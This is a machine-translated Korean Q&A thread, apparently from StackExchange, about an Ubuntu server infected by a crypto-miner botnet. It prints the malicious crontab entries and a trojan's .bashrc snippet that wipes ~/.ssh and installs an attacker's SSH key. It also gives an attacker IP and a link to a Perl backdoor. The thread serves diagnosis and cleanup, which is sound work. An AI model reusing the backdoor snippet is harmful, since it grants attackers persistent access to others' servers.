이상한 Cron 작업이 CPU Ubuntu 18 LTS 서버의 100 %를 차지함

나는 위어 크론 작업이 계속 나타나고 있으며 그들이 무엇을하는지 전혀 모른다. 나는 보통 그들을 죽이기 위해 kill -9를 발행한다. 그들은 내 CPU의 100 %를 차지하고 내가 확인할 때까지 며칠 동안 실행할 수 있습니다. 누구나 이것이 무엇을 의미하는지 알고 있습니까?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

어제 7/24/2019 현재 Ubuntu 18 LTS 서버를 완전히 최신 상태로 실행하고 있습니다

최신 정보

모든 의견에 감사드립니다. 영향을받은 유일한 것은 OS 드라이브이기 때문에 모든 데이터 및 응용 프로그램 드라이브의 연결을 끊었습니다. 적어도 적절한 종류의 작업을 수행했습니다. 더 많은 보안과 더 안전한 방법으로 완전한 재 구축을 진행할 것입니다.

컴퓨터는 암호 광부 감염이있을 가능성이 높습니다. 보안 센터를 사용하여 Azure에서 가상 머신의 실제 감지 에서 유사한 파일 이름 및 동작을보고하는 다른 사람을 볼 수 있습니다 . 또한 우분투 서버에 바이러스가 있습니다. 바이러스를 찾았지만 제거 할 수 없습니다 ... Reddit에서.

해당 시스템을 더 이상 신뢰할 수 없으므로 다시 설치해야합니다. 백업 복원에주의하십시오.

컴퓨터가 암호화 광부 공격에 감염되었습니다. 또한 과거에도 비슷한 랜섬웨어 공격에 직면하여 데이터베이스가 손상되었습니다. 머신에 대한 SQL 덤프를 가져 와서 머신을 다시 프로비저닝했습니다 (내 머신은 AWS EC2에서 호스팅되는 VM이므로). 또한 SSH 액세스 및 비밀번호를 잠그도록 시스템의 보안 그룹을 수정했습니다. 또한 로깅을 사용하여 매일 밤 쿼리를 로그하고 S3으로 내보냈습니다.

나에게도 마찬가지였으며 어제 눈치 notice습니다. 파일을 확인 /var/log/syslog했는데이 IP (185.234.218.40)가 자동으로 cronjob을 실행하는 것으로 나타났습니다.

http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) 에서 확인했으며 몇 가지 보고서가 있습니다. 이 파일들은 트로이 목마에 의해 편집되었습니다 :

• .bashrc
• .ssh / authorized_keys

나는 이것을 .bashrcbash가 열릴 때마다 실행되는 끝에 발견했다 .

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

authorized_keys비밀번호없이 연결할 수있는 SSH 키 목록 인 파일을 삭제 하고 있습니다. 그런 다음 공격자의 SSH 키를 추가합니다.

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

또한 /tmp/.X13-unix/.rsync모든 폴더가있는 폴더를 찾았습니다 . 심지어 /tmp/.X13-unix/.rsync/c/ip다른 희생자 나 노드 서버 일 가능성이있는 70 000 개의 IP 주소를 포함하는 파일 인 파일을 찾았습니다 .

두 가지 해결책이 있습니다.

• 포트 22 및 기타 필요한 연결을 제외한 모든 나가는 연결을 차단하는 방화벽을 추가하고 X가 비밀번호 시도에 실패한 후 IP 주소를 금지하는 프로그램 fail2ban을 활성화하십시오.

• 모든 cron 작업을 종료 ps aux | grep cron한 다음 표시되는 PID를 종료하십시오.

• 비밀번호를 안전한 비밀번호로 변경

비:

• 필요하거나 원하는 파일이나 폴더를 백업하십시오

• 서버를 재설정하고 Ubuntu를 다시 설치하거나 새 물방울을 직접 작성하십시오.

  Thom Wiggers가 말했듯이, 당신은 확실히 비트 코인 채굴 봇넷의 일부이며 서버에는 백도어가 있습니다. 백도어는 여기에있는 파일 인 perl exploit /tmp/.X13-unix/.rsync/b/run( https://pastebin.com/ceP2jsUy )을 사용합니다.

내가 찾은 가장 의심스러운 폴더는 다음과 같습니다.

• /tmp/.X13-unix/.rsync

• ~/.bashrc (편집 된)

• ~/.firefoxcatche

마지막으로 여기에 Perl Backdoor 관련 기사가 있습니다 : https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

이 정보가 도움이 되길 바랍니다.